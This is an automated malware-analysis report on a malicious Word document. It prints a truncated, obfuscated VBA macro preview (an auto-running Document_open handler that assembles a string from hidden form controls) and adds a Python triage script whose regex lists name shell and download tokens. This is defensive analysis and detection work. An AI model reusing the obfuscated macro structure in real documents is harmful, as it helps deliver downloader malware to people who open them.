Verdict: MALICIOUS
Risk score: 202

Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document carrying obfuscated VBA macros. The decoded source declares a Document_open handler on the document module, so the macro runs as soon as the file is opened with macros enabled; the handler calls Bsszujwlwp. Every routine in the visible source is padded with junk: Do While loops guarded by variables that are never assigned (an Empty Variant never equals 1, so their bodies never execute), lorem-ipsum string literals, and arithmetic on constants stored in variables nothing reads. Between the padding, the real code assembles a string from properties of hidden form controls (Zjvhrbpst.Pkcrbfruxqqk, a TextBox declared on the document module, and the Tag property of controls on the Qfwdvbgu form), defines a delimiter-like literal ("__&888*&^bBGks^@") and calls Split before the preview is cut off. The preview does not reach the point where the assembled string is used, but the analyzer's heuristics report a GetObject call in the macro code and an auto-execution token alongside execution tokens in the compiled p-code stream, and ClamAV flags the file as Doc.Downloader.Generic-7469762-0. Taken together this is consistent with a macro downloader that fetches and runs a second-stage payload.
Heuristics (6)
- ClamAV: Doc.Downloader.Generic-7469762-0 (critical) CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Generic-7469762-0
- VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS: the document contains VBA macro code
- Document_Open macro (high) OLE_VBA_DOCOPEN: a Document_Open handler runs the macro automatically when the document is opened with macros enabled
- GetObject call (high) OLE_VBA_GETOBJ: GetObject call, which obtains a reference to a COM automation object at runtime
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: the compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info) EMBEDDED_URL: one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace identifier present in ordinary Office files, not a network indicator; do not treat it as a download location or C2 address.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7699 bytes | d0844ef7b32133ef07fde84d5acd81b4b90e55e7250312c6bd74e6c9fcd45973 |

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "Zjvhrbpst"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Pkcrbfruxqqk, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Vsxcsqthpsv = 234 + 423
Do While Ulhnztvlka = 1
Gwngbesmxjx = 3 * Yhzjjyiv
Pyrazmdlrk = ("Accusantium fugiat facilis commodi.")
For Ufboncinko = Amvbbcetqj To Jesatyfkn
Tiulgmccale = ("Adipisci alias ipsam.")
Qbjpftvkhte = 223
Next
Iumicznybt = Ygnhxwfefkr
Loop
Bsszujwlwp
Elbmdkymoc = 234 + 423
Do While Bzylxlobrkv = 1
Gbabwvha = 3 * Vimzgrkdekdx
Evnnjrup = ("Dolorem dolore corrupti doloribus quia qui.")
For Wjykrgmmtf = Kmhkghqq To Ozwbitqqzg
Cxszlyyq = ("Dolorum officia ex.")
Ybkbgylnz = 223
Next
Nuyopyswdgw = Kjrgvsrgfh
Loop
End Sub
Attribute VB_Name = "Qfwdvbgu"
Attribute VB_Base = "0{6040592D-7473-4FA1-A6DF-0842EDC07B88}{B609B1DD-DA11-4B56-9C5F-3FCF55B119A1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Pnzbzthe"
Function Meqzuwbavz()
Wfibprxaq = 234 + 423
Do While Nrycciltbbod = 1
Acqckyhcjbmo = 3 * Affvsliykg
Vdceicvio = ("Mollitia et repudiandae non.")
For Yftklhxqn = Tvwslakb To Mddezetkty
Yhpybxqnqb = ("Ullam inventore rerum.")
Jhipqvymwwlc = 223
Next
Lddfudeiw = Mznlftly
Loop
Jtzutbmrwixdv = Zjvhrbpst.Pkcrbfruxqqk
Avzrjevtuhn = 234 + 423
Do While Egxuonuvwh = 1
Hqllvyalrbwp = 3 * Ddfcbmrib
Pjgoueou = ("Lester")
For Njiyingt = Hjjkqptfrc To Hkgpuwwwivp
Uxdszlpztsf = ("Tenetur est exercitationem veniam modi consectetur consequatur et qui quo.")
Xfkicteybxstt = 223
Next
Gbmuhtwsqnsri = Sapxzrlzsvy
Loop
Vvsrfpwhqplea = Jtzutbmrwixdv + Qfwdvbgu.Tjsfwgoqave + Qfwdvbgu.Jficvhxaze + Qfwdvbgu.Eegbgwkm
Hzmadwle = 234 + 423
Do While Yxkucxbyeabn = 1
Kaykhwxn = 3 * Nkfnvvzidhy
Lvpfnnsbt = ("Harum soluta commodi.")
For Qcxbxkvlwt = Sncjasknbnun To Qkzjpugtwtxy
Mnamfdwrlesi = ("Explicabo ut sunt est sint unde molestiae.")
Kciklftklnd = 223
Next
Zqjlbhrbon = Lvzzuqglp
Loop
Tqralznxyvlm = Vvsrfpwhqplea + Qfwdvbgu.Tacswkkfl + Qfwdvbgu.Fuwkkodvb.Tag
Nvoqwrhvd = 234 + 423
Do While Magnjdknxvq = 1
Fxevkerkxghj = 3 * Ttkbelqjbtlg
Nplxaukz = ("Minus mollitia et.")
For Kyadouydhj = Ntmjdwvlkezo To Vkjhjugyr
Muhuhyvlub = ("Quaerat perspiciatis vel eum veniam totam.")
Qqodbbgzmh = 223
Next
Ntaawmpcgyqbo = Gdcbgdzt
Loop
Meqzuwbavz = Pdjuarjmpsw + Tqralznxyvlm + Pdjuarjmpsw
Iaksnxnfhszrx = 234 + 423
Do While Ugrllztrbs = 1
Qaqsidjt = 3 * Svrmifznysf
Qmhdyoijzvtwf = ("Ipsam molestiae sit suscipit.")
For Rnnkqhov = Qosnuayzaafaa To Mdtaxpdpy
Euzrcqneiz = ("Tempora reiciendis rerum illo.")
Fvvweqvqncfee = 223
Next
Vjnzuqjwdaix = Vcewhnfcsyz
Loop
End Function
Function Bsszujwlwp()
Whupiiumtthh = 234 + 423
Do While Rdplwuce = 1
Idieaejun = 3 * Fwkyqksgkncj
Xmcmwpsl = ("Laborum molestiae.")
For Fzqmpkmul = Hfnfkjxltg To Edrhiqtyt
Trugraah = ("Ralph")
Nphpgmgvauam = 223
Next
Ixdddrkszb = Pcfksyuoqnk
Loop
iwiwiiwiwjjsj = "__&888*&^bBGks^@"
Bfhcxbxio = 234 + 423
Do While Wtvyxxvtacda = 1
Hxswohpjjch = 3 * Wlgzwdjfhbg
Gwzbxeqppd = ("Voluptate similique sapiente maiores.")
For Zkenjsqdky = Dhxhizvlldas To Fddxhhbnw
Rxjqhbhoe = ("Natus ullam et.")
Hihqhsawjld = 223
Next
Mzmraspledq = Udctefjpwv
Loop
Xshokoctxdop = Split("
... (truncated)
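The script below is an added example, not the analyzer's own code, showing how the checks in the heuristic table (OLE_VBA_DOCOPEN, OLE_VBA_GETOBJ, OLE_VBA_PCODE_AUTOEXEC_EXEC) can be applied to decoded VBA source, and how the junk padding visible in the preview can be stripped so the real control flow stands out. The regexes, the junk rules, the UTF-16LE/ASCII scan of a raw stream and the SAMPLE macro are constructed assumptions modelled on the preview, not the real sample; in practice the source comes from olevba (VBA_Parser(path).extract_macros()), which is what the artifact table credits.

```python
"""Triage decoded VBA source with the checks the heuristic table describes.

Added example for this report, not the analyzer's code.  Regexes, junk rules and
the constructed SAMPLE are assumptions modelled on the macro preview.
"""
import re

# Entry points Word/Excel run without user interaction (OLE_VBA_DOCOPEN and friends).
AUTOEXEC = re.compile(r"\b(?:Document_Open|Document_Close|Document_New|AutoOpen|AutoExec|"
                      r"AutoClose|Auto_Open|Workbook_Open|Workbook_Activate)\b", re.I)
# Shell / download / object-execution tokens (GetObject is the page's OLE_VBA_GETOBJ).
EXEC_TOKENS = re.compile(r"\b(?:GetObject|CreateObject|Shell|WScript\.Shell|ShellExecute|"
                         r"XMLHTTP|MSXML2|URLDownloadToFile|ADODB\.Stream|Exec|Run)\b", re.I)
# Junk seen in the preview: a loop guarded by a variable that is never assigned (without
# Option Explicit it is an Empty Variant, Empty = 1 is False, so the body never runs),
# and literal arithmetic stored in a variable nothing else reads.
DEAD_LOOP = re.compile(r"^\s*Do While (\w+) = 1\s*$", re.I)
LITERAL_ASSIGN = re.compile(r"^\s*(\w+)\s*=\s*\d+(?:\s*[-+*]\s*\d+)*\s*$")
VB_CONTROL = re.compile(r'Attribute VB_Control = "(\w+),')
VB_NAME = re.compile(r'Attribute VB_Name = "(\w+)"')


def _assigned(src, name):
    return re.search(rf"^\s*{name}\s*=", src, re.M | re.I) is not None


def strip_junk(src):
    """Drop dead loops and unread literal arithmetic; what survives is the real flow."""
    out, depth = [], 0
    for line in src.splitlines():
        if depth:                                   # inside a dead loop: skip to its Loop
            if re.match(r"^\s*Do\b", line, re.I):
                depth += 1
            elif re.match(r"^\s*Loop\b", line, re.I):
                depth -= 1
            continue
        m = DEAD_LOOP.match(line)
        if m and not _assigned(src, m.group(1)):
            depth = 1
            continue
        m = LITERAL_ASSIGN.match(line)
        if m and len(re.findall(rf"\b{m.group(1)}\b", src, re.I)) == 1:
            continue
        out.append(line)
    return "\n".join(out)


def control_reads(src):
    """Lines reading a VB_Control-declared control or any .Tag: strings hidden in controls."""
    controls = VB_CONTROL.findall(src)
    return [ln.strip() for ln in src.splitlines()
            if re.search(r"\.Tag\b", ln) or any(re.search(rf"\.{c}\b", ln) for c in controls)]


def pcode_autoexec_exec(stream):
    """OLE_VBA_PCODE_AUTOEXEC_EXEC on a raw VBA stream: an auto-exec name together with an
    execution token, searched as ASCII and UTF-16LE (assumed encodings) so the check still
    fires when source extraction fails."""
    texts = (stream.decode("latin-1"), stream.decode("utf-16le", "ignore"))
    return any(AUTOEXEC.search(t) for t in texts) and any(EXEC_TOKENS.search(t) for t in texts)


def triage(src):
    """Aggregate the findings into the verdict the report's heuristic table implies."""
    autoexec = sorted({m.group(0).lower() for m in AUTOEXEC.finditer(src)})
    tokens = sorted({t.lower() for t in EXEC_TOKENS.findall(src)})
    dead = sum(1 for ln in src.splitlines()
               if (m := DEAD_LOOP.match(ln)) and not _assigned(src, m.group(1)))
    reads = control_reads(src)
    verdict = ("malicious" if autoexec and tokens
               else "suspicious" if autoexec or tokens or dead or reads else "clean")
    return {"modules": VB_NAME.findall(src), "autoexec": autoexec, "exec_tokens": tokens,
            "dead_loops": dead, "control_reads": reads, "stripped": strip_junk(src),
            "verdict": verdict}


# Constructed sample shaped like the page's preview.  GetObject is placed here only so the
# sample trips OLE_VBA_GETOBJ; how the real macro uses it lies beyond the truncated preview.
SAMPLE = '''Attribute VB_Name = "Zjvhrbpst"
Attribute VB_Control = "Pkcrbfruxqqk, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Vsxcsqthpsv = 234 + 423
Do While Ulhnztvlka = 1
Pyrazmdlrk = ("Accusantium fugiat facilis commodi.")
For Ufboncinko = Amvbbcetqj To Jesatyfkn
Qbjpftvkhte = 223
Next
Loop
Bsszujwlwp
End Sub
Attribute VB_Name = "Pnzbzthe"
Function Meqzuwbavz()
Jtzutbmrwixdv = Zjvhrbpst.Pkcrbfruxqqk
Tqralznxyvlm = Jtzutbmrwixdv + Qfwdvbgu.Fuwkkodvb.Tag
Meqzuwbavz = Tqralznxyvlm
End Function
Function Bsszujwlwp()
Set Obj = GetObject(Meqzuwbavz())
End Function
'''

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}:\n{value}" if key == "stripped" else f"{key}: {value}")
```

Run against the page's full macros.bas, strip_junk reduces Document_open to the single call to Bsszujwlwp and leaves the lines that read Zjvhrbpst.Pkcrbfruxqqk and the .Tag properties, which is where the real string lives. A loop whose guard the macro does assign somewhere is kept, so a legitimate loop is not removed; the dead-loop rule relies on the absence of Option Explicit, which the preview shows.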